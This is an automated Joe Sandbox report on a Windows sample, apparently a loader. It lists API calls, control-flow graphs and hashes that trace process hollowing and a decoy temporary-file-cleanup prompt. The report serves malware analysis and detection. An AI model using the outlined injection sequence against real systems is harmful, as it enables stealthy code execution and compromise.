                                                                                                                        execution_graph 21112 4f0b5a 21113 4f0b61 21112->21113 21114 4f0b6d 21113->21114 21116 4f0e4d ExitProcess 21113->21116 21117 4f020a 21113->21117 21132 4f005f GetPEB 21117->21132 21119 4f03b3 21119->21113 21120 4f03c1 CreateProcessW 21121 4f03f0 Wow64GetThreadContext 21120->21121 21125 4f03eb 21120->21125 21122 4f0410 ReadProcessMemory 21121->21122 21121->21125 21122->21125 21131 4f0218 21122->21131 21124 4f1207 11 API calls 21124->21131 21125->21119 21160 4f1207 21125->21160 21127 4f13b6 11 API calls 21127->21131 21129 4f0675 Wow64SetThreadContext 21129->21125 21129->21131 21131->21119 21131->21120 21131->21124 21131->21125 21131->21127 21131->21129 21133 4f129c 21131->21133 21142 4f1055 21131->21142 21151 4f1156 21131->21151 21132->21131 21134 4f12b7 21133->21134 21169 4f013e GetPEB 21134->21169 21136 4f12d8 21137 4f1390 21136->21137 21138 4f12e0 21136->21138 21186 4f16e2 21137->21186 21171 4f0e56 21138->21171 21141 4f1377 21141->21131 21143 4f1070 21142->21143 21144 4f013e GetPEB 21143->21144 21145 4f1091 21144->21145 21146 4f1099 21145->21146 21147 4f1123 21145->21147 21148 4f0e56 10 API calls 21146->21148 21196 4f1706 21147->21196 21150 4f110a 21148->21150 21150->21131 21152 4f1171 21151->21152 21153 4f013e GetPEB 21152->21153 21154 4f1192 21153->21154 21155 4f11dc 21154->21155 21156 4f1196 21154->21156 21199 4f1718 21155->21199 21157 4f0e56 10 API calls 21156->21157 21159 4f11d1 21157->21159 21159->21131 21161 4f121a 21160->21161 21162 4f013e GetPEB 21161->21162 21163 4f123b 21162->21163 21164 4f123f 21163->21164 21165 4f1285 21163->21165 21167 4f0e56 10 API calls 21164->21167 21202 4f16d0 21165->21202 21168 4f127a 21167->21168 21168->21119 21170 4f0160 21169->21170 21170->21136 21189 4f005f GetPEB 21171->21189 21173 4f0e9f 21190 4f0109 GetPEB 21173->21190 21176 4f0f2c 21177 4f0f3d VirtualAlloc 21176->21177 21182 4f1001 21176->21182 21178 4f0f53 ReadFile 21177->21178 21177->21182 21179 4f0f68 VirtualAlloc 21178->21179 21178->21182 21179->21182 21183 4f0f89 21179->21183 21180 4f103f VirtualFree 21181 4f104a 21180->21181 21181->21141 21182->21180 21182->21181 21183->21182 21184 4f0ff4 VirtualFree 21183->21184 21185 4f0ff0 FindCloseChangeNotification 21183->21185 21184->21182 21185->21184 21187 4f0e56 10 API calls 21186->21187 21188 4f16ec 21187->21188 21188->21141 21189->21173 21191 4f011c 21190->21191 21193 4f0131 CreateFileW 21191->21193 21194 4f017b GetPEB 21191->21194 21193->21176 21193->21182 21195 4f019f 21194->21195 21195->21191 21197 4f0e56 10 API calls 21196->21197 21198 4f1710 21197->21198 21198->21150 21200 4f0e56 10 API calls 21199->21200 21201 4f1722 21200->21201 21201->21159 21203 4f0e56 10 API calls 21202->21203 21204 4f16da 21203->21204 21204->21168 22483 411556 22488 411501 __CallSettingFrame@12 22483->22488 22484 411565 22497 41158a 22484->22497 22488->22484 22491 41899c 22488->22491 22489 41157b _fputc 22490 41899c CallUnexpected 63 API calls 22490->22489 22502 415600 22491->22502 22493 4189a8 DecodePointer 22494 4189b8 22493->22494 22495 4189d4 FindHandler 62 API calls 22494->22495 22496 4189d3 22495->22496 22498 4163c9 CallUnexpected 58 API calls 22497->22498 22499 41158f 22498->22499 22500 411571 22499->22500 22501 4163c9 CallUnexpected 58 API calls 22499->22501 22500->22489 22500->22490 22501->22500 22502->22493 18780 410612 18781 41061e _fputc 18780->18781 18817 412dc8 GetStartupInfoW 18781->18817 18784 410623 18819 4168a7 GetProcessHeap 18784->18819 18785 41067b 18786 410686 18785->18786 18918 410762 18785->18918 18820 416503 18786->18820 18818 412dde 18817->18818 18818->18784 18819->18785 18939 4153e1 EncodePointer 18820->18939 18919 410773 18918->18919 18920 41076e 18918->18920 18922 419b6f __NMSG_WRITE 58 API calls 18919->18922 18921 419b12 __FF_MSGBANNER 58 API calls 18920->18921 18921->18919 18923 41077b 18922->18923 18924 4152f9 _fast_error_exit 3 API calls 18923->18924 18925 410785 18924->18925 18925->18786 18940 4153f2 __init_pointers __initp_misc_winsig 18939->18940 18943 418a1b EncodePointer 18940->18943 18942 41540a __init_pointers 18943->18942 21205 4f08b7 21217 4f005f GetPEB 21205->21217 21207 4f0a3d 21218 4f0838 21207->21218 21209 4f0ade 21210 4f0a45 21210->21209 21211 4f0afa CreateFileW 21210->21211 21211->21209 21212 4f0b24 VirtualAlloc ReadFile 21211->21212 21212->21209 21215 4f0b54 21212->21215 21213 4f0b6d 21214 4f020a 15 API calls 21214->21215 21215->21213 21215->21214 21216 4f0e4d ExitProcess 21215->21216 21217->21207 21231 4f005f GetPEB 21218->21231 21220 4f084c 21232 4f005f GetPEB 21220->21232 21222 4f085f 21233 4f005f GetPEB 21222->21233 21224 4f0872 21234 4f07da 21224->21234 21226 4f0880 21227 4f089c VirtualAllocExNuma 21226->21227 21228 4f08a9 21227->21228 21239 4f073a 21228->21239 21231->21220 21232->21222 21233->21224 21244 4f005f GetPEB 21234->21244 21236 4f07ea 21237 4f07f0 GetSystemInfo 21236->21237 21238 4f081b 21237->21238 21238->21226 21245 4f005f GetPEB 21239->21245 21241 4f0746 21242 4f0766 VirtualAlloc 21241->21242 21243 4f0783 21242->21243 21243->21210 21244->21236 21245->21241

                                                                                                                        Executed Functions

                                                                                                                        Function 004F08B7 Relevance: 6.5, APIs: 4, Instructions: 459COMMON
                                                                                                                        Download Yara Rule

                                                                                                                        Control-flow Graph

                                                                                                                        • Executed
                                                                                                                        • Not Executed
                                                                                                                        control_flow_graph 228 4f08b7-4f0adc call 4f005f call 4f0838 call 4f0073 * 8 250 4f0ade 228->250 251 4f0ae3-4f0af3 228->251 252 4f0e52-4f0e55 250->252 254 4f0afa-4f0b1d CreateFileW 251->254 255 4f0af5 251->255 256 4f0b1f 254->256 257 4f0b24-4f0b4d VirtualAlloc ReadFile 254->257 255->252 256->252 258 4f0b4f 257->258 259 4f0b54-4f0b67 257->259 258->252 261 4f0b6d-4f0e37 259->261 262 4f0e3c-4f0e4b call 4f020a 259->262 265 4f0e4d-4f0e4f ExitProcess 262->265
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.1278604538.00000000004F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 004F0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_4f0000_okawzsv.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: AllocNumaVirtual
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 4233825816-0
                                                                                                                        • Opcode ID: 9e58c89621ce49108897f7b77435126a2583bf69f22a21251ea728c797b76d89
                                                                                                                        • Instruction ID: e582769cc2ca96275a0f5243315e3139ceb59238ff983304d9c4a17d94b2d25d
                                                                                                                        • Opcode Fuzzy Hash: 9e58c89621ce49108897f7b77435126a2583bf69f22a21251ea728c797b76d89
                                                                                                                        • Instruction Fuzzy Hash: 57120720D5C3DCADDF11CBE998117FCBFB09F16601F1844CAE594EA292C27A478ADB25
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 004F07DA Relevance: 1.5, APIs: 1, Instructions: 34COMMON
                                                                                                                        Download Yara Rule

                                                                                                                        Control-flow Graph

                                                                                                                        • Executed
                                                                                                                        • Not Executed
                                                                                                                        control_flow_graph 303 4f07da-4f0820 call 4f005f call 4f0073 GetSystemInfo 309 4f0829 303->309 310 4f0822-4f0825 303->310 311 4f082b-4f082e 309->311 310->311
                                                                                                                        APIs
                                                                                                                        • GetSystemInfo.KERNELBASE(?), ref: 004F07F7
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.1278604538.00000000004F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 004F0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_4f0000_okawzsv.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: InfoSystem
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 31276548-0
                                                                                                                        • Opcode ID: fa2979548fe31277adddc85b40786a5f89b5b758f8f4ce622a53a7dd496667a7
                                                                                                                        • Instruction ID: e28f677c6270f52af9ae0c0dfb627f1c8e832ad2ef5b171f89d06d70bc0659fe
                                                                                                                        • Opcode Fuzzy Hash: fa2979548fe31277adddc85b40786a5f89b5b758f8f4ce622a53a7dd496667a7
                                                                                                                        • Instruction Fuzzy Hash: E7F0A771E1410CAFDB08F6B898456BE77ACDB48340F10456EEB06E2242D938854142A5
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 004012E0 Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 159memoryCOMMON
                                                                                                                        Download Yara Rule

                                                                                                                        Control-flow Graph

                                                                                                                        APIs
                                                                                                                        • VirtualAlloc.KERNELBASE(00000000,0000173F,00003000,00000040,00000000,-02FAF080,00000000), ref: 004013CA
                                                                                                                        • EnumSystemCodePagesA.KERNEL32(?,00000000), ref: 004013EC
                                                                                                                        • _Func_class.LIBCPMTD ref: 00401417
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.1278471440.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.1278456869.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.1278493801.0000000000426000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.1278511145.0000000000430000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_400000_okawzsv.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: AllocCodeEnumFunc_classPagesSystemVirtual
                                                                                                                        • String ID: temporary files found. Do you want to delete them? [Y/N] $ wB$No temporary files found.$Temporary files deleted.
                                                                                                                        • API String ID: 731087948-139088005
                                                                                                                        • Opcode ID: 3524a20efb6578a205a79b428c811a774921cadfc3268cd0dfb05574dc291a75
                                                                                                                        • Instruction ID: 99a95a9a6439131c4b637fe13e621d707a309283a1d738988d81d9425d40f7e0
                                                                                                                        • Opcode Fuzzy Hash: 3524a20efb6578a205a79b428c811a774921cadfc3268cd0dfb05574dc291a75
                                                                                                                        • Instruction Fuzzy Hash: 99518FB0E00218ABDB04EBE5D852BEEBBB4AF48704F10852EF5157B2D1DB7C5905CB69
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 004F0E56 Relevance: 10.7, APIs: 7, Instructions: 194filememoryCOMMON
                                                                                                                        Download Yara Rule

                                                                                                                        Control-flow Graph

                                                                                                                        • Executed
                                                                                                                        • Not Executed
                                                                                                                        control_flow_graph 57 4f0e56-4f0f26 call 4f005f call 4f0073 * 7 call 4f0109 CreateFileW 76 4f0f2c-4f0f37 57->76 77 4f1005 57->77 76->77 82 4f0f3d-4f0f4d VirtualAlloc 76->82 78 4f1007-4f100c 77->78 80 4f100e 78->80 81 4f1012-4f1017 78->81 80->81 86 4f1033-4f1036 81->86 82->77 83 4f0f53-4f0f62 ReadFile 82->83 83->77 85 4f0f68-4f0f87 VirtualAlloc 83->85 87 4f0f89-4f0f9c call 4f00da 85->87 88 4f1001-4f1003 85->88 89 4f1019-4f101d 86->89 90 4f1038-4f103d 86->90 99 4f0f9e-4f0fa9 87->99 100 4f0fd7-4f0fe7 call 4f0073 87->100 88->78 94 4f101f-4f1027 89->94 95 4f1029-4f102b 89->95 91 4f103f-4f1047 VirtualFree 90->91 92 4f104a-4f1052 90->92 91->92 94->86 97 4f102d-4f1030 95->97 98 4f1032 95->98 97->86 98->86 101 4f0fac-4f0fd5 call 4f00da 99->101 100->78 106 4f0fe9-4f0fee 100->106 101->100 107 4f0ff4-4f0fff VirtualFree 106->107 108 4f0ff0-4f0ff1 FindCloseChangeNotification 106->108 107->86 108->107
                                                                                                                        APIs
                                                                                                                        • CreateFileW.KERNELBASE(00000000,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,?,?,?,?,004F16EC,7FAB7E30), ref: 004F0F1C
                                                                                                                        • VirtualAlloc.KERNELBASE(00000000,00000000,00003000,00000004,?,?,?,?,?,?,?,004F16EC,7FAB7E30,004F13AA,00000000,00000040), ref: 004F0F46
                                                                                                                        • ReadFile.KERNELBASE(00000000,00000000,0000000E,7FAB7E30,00000000,?,?,?,?,?,?,?,004F16EC,7FAB7E30,004F13AA,00000000), ref: 004F0F5D
                                                                                                                        • VirtualAlloc.KERNELBASE(00000000,00000000,00003000,00000004,?,?,?,?,?,?,?,004F16EC,7FAB7E30,004F13AA,00000000,00000040), ref: 004F0F7F
                                                                                                                        • FindCloseChangeNotification.KERNELBASE(00000000,?,?,?,?,?,?,?,004F16EC,7FAB7E30,004F13AA,00000000,00000040,?,00000000,0000000E), ref: 004F0FF1
                                                                                                                        • VirtualFree.KERNELBASE(00000000,00000000,00008000,?,?,?,?,?,?,?,004F16EC,7FAB7E30,004F13AA,00000000,00000040,?), ref: 004F0FFC
                                                                                                                        • VirtualFree.KERNELBASE(00000000,00000000,00008000,?,?,?,?,?,?,?,004F16EC,7FAB7E30,004F13AA,00000000,00000040,?), ref: 004F1047
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.1278604538.00000000004F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 004F0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_4f0000_okawzsv.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: Virtual$AllocFileFree$ChangeCloseCreateFindNotificationRead
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 656311269-0
                                                                                                                        • Opcode ID: e00993cede710d11fe9b2ff616e286c211551c7adfe418e5463a27554f42b46b
                                                                                                                        • Instruction ID: 67c75bcfd1bd1575ec3a5d5694105b4a5de0ba96e44f538234c8ca1953260fec
                                                                                                                        • Opcode Fuzzy Hash: e00993cede710d11fe9b2ff616e286c211551c7adfe418e5463a27554f42b46b
                                                                                                                        • Instruction Fuzzy Hash: D551A171E00258AFDB209FB5DC84BBEB778AF44714F10411AF640F7291EB7899418B68
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 004F020A Relevance: 9.2, APIs: 4, Strings: 1, Instructions: 425COMMON
                                                                                                                        Download Yara Rule

                                                                                                                        Control-flow Graph

                                                                                                                        • Executed
                                                                                                                        • Not Executed
                                                                                                                        control_flow_graph 109 4f020a-4f0225 call 4f005f 112 4f0228-4f022c 109->112 113 4f022e-4f0242 112->113 114 4f0244-4f0251 112->114 113->112 115 4f0254-4f0258 114->115 116 4f025a-4f026e 115->116 117 4f0270-4f027d 115->117 116->115 118 4f0280-4f0284 117->118 119 4f029c-4f037a call 4f0073 * 8 118->119 120 4f0286-4f029a 118->120 137 4f037c-4f0386 119->137 138 4f0391 119->138 120->118 137->138 139 4f0388-4f038f 137->139 140 4f0395-4f03b1 138->140 139->140 142 4f03ba 140->142 143 4f03b3-4f03b5 140->143 145 4f03c1-4f03e9 CreateProcessW 142->145 144 4f0734-4f0737 143->144 146 4f03eb 145->146 147 4f03f0-4f0409 Wow64GetThreadContext 145->147 148 4f06e8-4f06ec 146->148 149 4f040b 147->149 150 4f0410-4f042d ReadProcessMemory 147->150 151 4f06ee-4f06f2 148->151 152 4f0731-4f0733 148->152 149->148 153 4f042f 150->153 154 4f0434-4f043d 150->154 155 4f0705-4f0709 151->155 156 4f06f4-4f06ff 151->156 152->144 153->148 157 4f043f-4f044e 154->157 158 4f0464-4f0483 call 4f129c 154->158 161 4f070b 155->161 162 4f0711-4f0715 155->162 156->155 157->158 159 4f0450-4f0456 call 4f1207 157->159 169 4f048a-4f04ab call 4f13b6 158->169 170 4f0485 158->170 168 4f045b-4f045d 159->168 161->162 166 4f071d-4f0721 162->166 167 4f0717 162->167 171 4f072d-4f072f 166->171 172 4f0723-4f0728 call 4f1207 166->172 167->166 168->158 173 4f045f 168->173 177 4f04ad-4f04b4 169->177 178 4f04f0-4f0510 call 4f13b6 169->178 170->148 171->144 172->171 173->148 180 4f04eb 177->180 181 4f04b6-4f04e2 call 4f13b6 177->181 184 4f0517-4f052c call 4f00da 178->184 185 4f0512 178->185 180->148 188 4f04e9 181->188 189 4f04e4 181->189 191 4f0535-4f053f 184->191 185->148 188->178 189->148 192 4f0571-4f0575 191->192 193 4f0541-4f056f call 4f00da 191->193 195 4f057b-4f0589 192->195 196 4f0655-4f0671 call 4f1055 192->196 193->191 195->196 197 4f058f-4f059d 195->197 204 4f0675-4f0696 Wow64SetThreadContext 196->204 205 4f0673 196->205 197->196 200 4f05a3-4f05c3 197->200 203 4f05c6-4f05ca 200->203 203->196 206 4f05d0-4f05e5 203->206 207 4f069a-4f06a4 call 4f1156 204->207 208 4f0698 204->208 205->148 210 4f05f7-4f05fb 206->210 214 4f06a8-4f06ac 207->214 215 4f06a6 207->215 208->148 212 4f05fd-4f0609 210->212 213 4f0638-4f0650 210->213 216 4f060b-4f0634 212->216 217 4f0636 212->217 213->203 218 4f06ae 214->218 219 4f06b4-4f06b8 214->219 215->148 216->217 217->210 218->219 221 4f06ba 219->221 222 4f06c0-4f06c4 219->222 221->222 223 4f06cc-4f06d0 222->223 224 4f06c6 222->224 225 4f06dc-4f06e2 223->225 226 4f06d2-4f06d7 call 4f1207 223->226 224->223 225->145 225->148 226->225
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.1278604538.00000000004F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 004F0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_4f0000_okawzsv.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: D
                                                                                                                        • API String ID: 0-2746444292
                                                                                                                        • Opcode ID: 63e705ddf96c5ba8fbb62556a8bbc1a041144a888f466dd9df93f91b1bb00d78
                                                                                                                        • Instruction ID: 219c7eda22173d52b7a6b299457de9a64624d92e43103572e6ea9c91660246c0
                                                                                                                        • Opcode Fuzzy Hash: 63e705ddf96c5ba8fbb62556a8bbc1a041144a888f466dd9df93f91b1bb00d78
                                                                                                                        • Instruction Fuzzy Hash: 1902D27090020CEFEF10DF94C985BBDBBB5BF44305F20415AE615BA2A2D778AA91DF19
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 0040E1F0 Relevance: 4.5, APIs: 3, Instructions: 29COMMONLIBRARYCODE
                                                                                                                        Download Yara Rule

                                                                                                                        Control-flow Graph

                                                                                                                        • Executed
                                                                                                                        • Not Executed
                                                                                                                        control_flow_graph 266 40e1f0-40e1f6 267 40e205-40e208 call 4122b3 266->267 269 40e20d-40e210 267->269 270 40e212-40e215 269->270 271 40e1f8-40e203 call 4151e0 269->271 271->267 274 40e216-40e240 call 40f8df call 40fa12 271->274
                                                                                                                        APIs
                                                                                                                        • _malloc.LIBCMT ref: 0040E208
                                                                                                                          • Part of subcall function 004122B3: __FF_MSGBANNER.LIBCMT ref: 004122CA
                                                                                                                          • Part of subcall function 004122B3: __NMSG_WRITE.LIBCMT ref: 004122D1
                                                                                                                          • Part of subcall function 004122B3: RtlAllocateHeap.NTDLL(00500000,00000000,00000001,00000000,00000000,00000000,?,00412111,?,?,?,00000000,?,0041085D,00000018,0042E4E8), ref: 004122F6
                                                                                                                        • std::exception::exception.LIBCMT ref: 0040E226
                                                                                                                        • __CxxThrowException@8.LIBCMT ref: 0040E23B
                                                                                                                          • Part of subcall function 0040FA12: RaiseException.KERNEL32(?,?,02FAF080,0042E150,?,?,?,?,?,0040E240,02FAF080,0042E150,?,00000001), ref: 0040FA67
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.1278471440.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.1278456869.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.1278493801.0000000000426000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.1278511145.0000000000430000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_400000_okawzsv.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: AllocateExceptionException@8HeapRaiseThrow_mallocstd::exception::exception
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3074076210-0
                                                                                                                        • Opcode ID: da6ce684dac93f3a2bc880ebf22aaaa1d2c9430f2d3ea266589f4d49ec2841f2
                                                                                                                        • Instruction ID: 96440027f977c08db43c631dc153699ec31c4607eae88ab91699e467c9313909
                                                                                                                        • Opcode Fuzzy Hash: da6ce684dac93f3a2bc880ebf22aaaa1d2c9430f2d3ea266589f4d49ec2841f2
                                                                                                                        • Instruction Fuzzy Hash: B7E06C3094011EA6DB10BB56DC05AEE777CAF00344F50487BF814755C1EF799A54969D
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 004F0838 Relevance: 1.5, APIs: 1, Instructions: 39memoryCOMMON
                                                                                                                        Download Yara Rule

                                                                                                                        Control-flow Graph

                                                                                                                        APIs
                                                                                                                          • Part of subcall function 004F07DA: GetSystemInfo.KERNELBASE(?), ref: 004F07F7
                                                                                                                        • VirtualAllocExNuma.KERNELBASE(00000000), ref: 004F089D
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.1278604538.00000000004F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 004F0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_4f0000_okawzsv.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: AllocInfoNumaSystemVirtual
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 449148690-0
                                                                                                                        • Opcode ID: 5104fe00cea5b6b43bfce270a0a2c81ff317ca7eb47637b87448d486c4f4107a
                                                                                                                        • Instruction ID: 77f983363b1d9ec3cb54e3850fe7426b1a1202c8183739302712e2272d81936b
                                                                                                                        • Opcode Fuzzy Hash: 5104fe00cea5b6b43bfce270a0a2c81ff317ca7eb47637b87448d486c4f4107a
                                                                                                                        • Instruction Fuzzy Hash: 93F0F470E4530CBEEB107BF2590B77D76689F80349F10459B7B4066183DE7C56008AAD
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 004F073A Relevance: 1.3, APIs: 1, Instructions: 60memoryCOMMON
                                                                                                                        Download Yara Rule

                                                                                                                        Control-flow Graph

                                                                                                                        • Executed
                                                                                                                        • Not Executed
                                                                                                                        control_flow_graph 369 4f073a-4f0781 call 4f005f call 4f0073 * 2 VirtualAlloc 376 4f0788-4f0790 369->376 377 4f0783-4f0786 369->377 378 4f07d5-4f07d9 376->378 379 4f0792-4f079f 376->379 377->376 380 4f07a2-4f07a6 379->380 381 4f07be-4f07cf 380->381 382 4f07a8-4f07bc 380->382 381->378 382->380
                                                                                                                        APIs
                                                                                                                        • VirtualAlloc.KERNELBASE(00000000,17D78400,00003000,00000004), ref: 004F0777
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.1278604538.00000000004F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 004F0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_4f0000_okawzsv.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: AllocVirtual
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 4275171209-0
                                                                                                                        • Opcode ID: fefa28e21f4d9309c1ecd3ac6253e750ecc73c234d91debfceddd181198d7f09
                                                                                                                        • Instruction ID: 42ae331d2a9f6e5f35b2cced4bc1e0976e60b4b31ef37aaffdb62c729d69babd
                                                                                                                        • Opcode Fuzzy Hash: fefa28e21f4d9309c1ecd3ac6253e750ecc73c234d91debfceddd181198d7f09
                                                                                                                        • Instruction Fuzzy Hash: 49113670D0020CAFDB00EBA8CC49BBEBBF4EB04304F208496EA00B7292D6795A408F94
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Non-executed Functions

                                                                                                                        Function 00421816 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 56COMMONLIBRARYCODE
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • _wcscmp.LIBCMT ref: 0042182D
                                                                                                                        • _wcscmp.LIBCMT ref: 0042183E
                                                                                                                        • GetLocaleInfoW.KERNEL32(?,2000000B,?,00000002,?,?,00421ADC,?,00000000), ref: 0042185A
                                                                                                                        • GetLocaleInfoW.KERNEL32(?,20001004,?,00000002,?,?,00421ADC,?,00000000), ref: 00421884
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.1278471440.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.1278456869.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.1278493801.0000000000426000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.1278511145.0000000000430000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_400000_okawzsv.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: InfoLocale_wcscmp
                                                                                                                        • String ID: ACP$OCP
                                                                                                                        • API String ID: 1351282208-711371036
                                                                                                                        • Opcode ID: 7838b46f68dda82ca198f56f60918cfdbad7ae22e573119e03ca8bad1d8671c0
                                                                                                                        • Instruction ID: 5a93db1e8068defea7b2ae2f6c085f6bf5d13d741adaa41fb30002094f6303f2
                                                                                                                        • Opcode Fuzzy Hash: 7838b46f68dda82ca198f56f60918cfdbad7ae22e573119e03ca8bad1d8671c0
                                                                                                                        • Instruction Fuzzy Hash: 92018431300125AADB21AF56FC81F9B37E8AF14755F908027F905DA161E738D942C78D
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 00413115 Relevance: 3.0, APIs: 2, Instructions: 8COMMONLIBRARYCODE
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • SetUnhandledExceptionFilter.KERNEL32(00000000,?,00416694,?,?,?,00000000), ref: 0041311A
                                                                                                                        • UnhandledExceptionFilter.KERNEL32(?,?,?,00000000), ref: 00413123
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.1278471440.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.1278456869.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.1278493801.0000000000426000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.1278511145.0000000000430000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_400000_okawzsv.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: ExceptionFilterUnhandled
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3192549508-0
                                                                                                                        • Opcode ID: ebb97cce6e92702754f88398b24774fe136fed1aecae987d655b45f225664c3a
                                                                                                                        • Instruction ID: b7adb7d193c243b961f6339d3fcad427306452b133b830038cc2aa60d74570a9
                                                                                                                        • Opcode Fuzzy Hash: ebb97cce6e92702754f88398b24774fe136fed1aecae987d655b45f225664c3a
                                                                                                                        • Instruction Fuzzy Hash: 52B09231644209ABCB106B91EC09B483F28FB04652F818034FA0E44061EFA25412AA99
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 00414DBD Relevance: 1.5, APIs: 1, Instructions: 20COMMONLIBRARYCODE
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • EnumSystemLocalesW.KERNEL32(00414DA9,00000001,?,00420CF1,00420D8F,00000003,00000000,?,?,00000000,00000000,00000000,00000000,00000000), ref: 00414DEB
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.1278471440.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.1278456869.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.1278493801.0000000000426000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.1278511145.0000000000430000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_400000_okawzsv.jbxd
                                                                                                                        Yara matches
